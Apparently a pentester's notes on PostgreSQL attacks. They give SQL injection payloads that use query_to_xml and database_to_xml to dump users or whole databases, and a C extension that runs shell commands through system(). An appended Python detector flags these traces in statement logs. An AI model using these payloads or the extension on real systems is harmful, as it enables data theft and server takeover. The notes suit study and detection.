xct's notes
Postgres

Query_To_XML

We can get the result of a query as XML, which makes data exfiltration a lot faster.
Example:
http://127.0.0.1:5000/?order=id&sort=,(CASE%20WHEN%20((SELECT%20CAST(CHR(32)||(SELECT%20query_to_xml('select%20*%20from%20pg_user',true,true,''))%20AS%20NUMERIC)=%271%27))%20THEN%20name%20ELSE%20note%20END)

Database_To_XML

We can even get the complete database as XML in a single query!
http://127.0.0.1:5000/?order=id&sort=,(CASE%20WHEN%20((SELECT%20CAST(CHR(32)||(SELECT%20database_to_xml(true,true,''))%20AS%20NUMERIC)=%271%27))%20THEN%20name%20ELSE%20note%20END)

RCE via Config File Overwrite

Load shared library

Install the PostgreSQL server headers needed to build an extension (the notes use version 11):
sudo apt-get install postgresql-server-dev-11
xct.c:
#include "postgres.h"
#include "fmgr.h"
#include <stdlib.h>

#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif

PG_FUNCTION_INFO_V1(exec);

/* Entry point behind the SQL-level exec() wrapper; runs <cmd> through the
   shell as the operating-system user the server runs as. */
Datum exec(PG_FUNCTION_ARGS)
{
    system("<cmd>");
    PG_RETURN_NULL();   /* the SQL result is not used; return NULL rather than garbage */
}
Compile it against the server headers:
gcc xct.c -I`pg_config --includedir-server` -fPIC -shared -o xct.so
Register and call it from SQL. C is an untrusted language, so CREATE FUNCTION ... LANGUAGE C requires superuser, and the .so must be readable by the server process at the given path:
CREATE OR REPLACE FUNCTION exec() RETURNS text AS '/tmp/xct.so', 'exec' LANGUAGE C STRICT;
SELECT exec();
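From the defender's side, as an added example that is not part of the original notes: a small Python detector that scans PostgreSQL statement logs for the traces the techniques above leave behind, namely the *_to_xml calls, the CHR(32)||... cast to NUMERIC used as the error oracle, and a CREATE FUNCTION ... LANGUAGE C bound to a shared object. It assumes log_statement = 'all' with the log_line_prefix shown in the comment; the log lines are constructed samples.

```python
import re

# Constructed sample lines (not from any real system), in the shape PostgreSQL
# writes with log_statement = 'all' and log_line_prefix = '%m [%p] %u@%d '.
SAMPLE_LOG = """\
2024-01-01 10:00:00.000 UTC [1234] app@shop LOG:  statement: SELECT id, name FROM items ORDER BY id
2024-01-01 10:00:01.000 UTC [1234] app@shop LOG:  statement: SELECT id FROM items ORDER BY id,(CASE WHEN ((SELECT CAST(CHR(32)||(SELECT query_to_xml('select * from pg_user',true,true,'')) AS NUMERIC)='1')) THEN name ELSE note END)
2024-01-01 10:00:02.000 UTC [1234] app@shop LOG:  statement: SELECT CAST(CHR(32)||(SELECT database_to_xml(true,true,'')) AS NUMERIC)
2024-01-01 10:00:03.000 UTC [1234] app@shop LOG:  statement: CREATE OR REPLACE FUNCTION exec() RETURNS text AS '/tmp/xct.so', 'exec' LANGUAGE C STRICT;
2024-01-01 10:00:04.000 UTC [1234] app@shop LOG:  statement: SELECT exec();
"""

# One 'statement:' entry per line; statements wrapped over several lines are
# out of scope for this example.
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) "
    r"LOG:\s+statement: (?P<sql>.*)$")

# Each rule names the trace one of the techniques above leaves in query text.
RULES = [
    # Whole-result XML serialisation of a query, table, schema or database.
    ("xml-dump-function",
     re.compile(r"\b(query|table|schema|database)_to_xml\s*\(", re.I)),
    # CHR(32)||... cast to NUMERIC: the error-based oracle that reflects the
    # XML text back inside the database error message.
    ("cast-error-oracle",
     re.compile(r"CAST\s*\(\s*CHR\s*\(\s*32\s*\)\s*\|\|.*\bAS\s+NUMERIC\b", re.I)),
    # A C-language function bound to a shared object on disk (needs superuser).
    ("untrusted-c-function",
     re.compile(r"CREATE\s+(?:OR\s+REPLACE\s+)?FUNCTION\b.*\bLANGUAGE\s+C\b", re.I)),
]

def parse_statements(log_text):
    """Yield one dict (ts, pid, user, db, sql) per parseable statement line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.groupdict()

def detect(log_text):
    """Return [(timestamp, 'user@db', [rule names])] for statements that hit a rule."""
    findings = []
    for rec in parse_statements(log_text):
        hits = [name for name, rx in RULES if rx.search(rec["sql"])]
        if hits:
            findings.append((rec["ts"], f"{rec['user']}@{rec['db']}", hits))
    return findings

if __name__ == "__main__":
    for ts, who, hits in detect(SAMPLE_LOG):
        print(ts, who, ", ".join(hits))
```

The plain SELECT and the later SELECT exec() are not flagged on their own; the CREATE FUNCTION that precedes the call is the event worth alerting on, and a non-superuser application role cannot issue it at all.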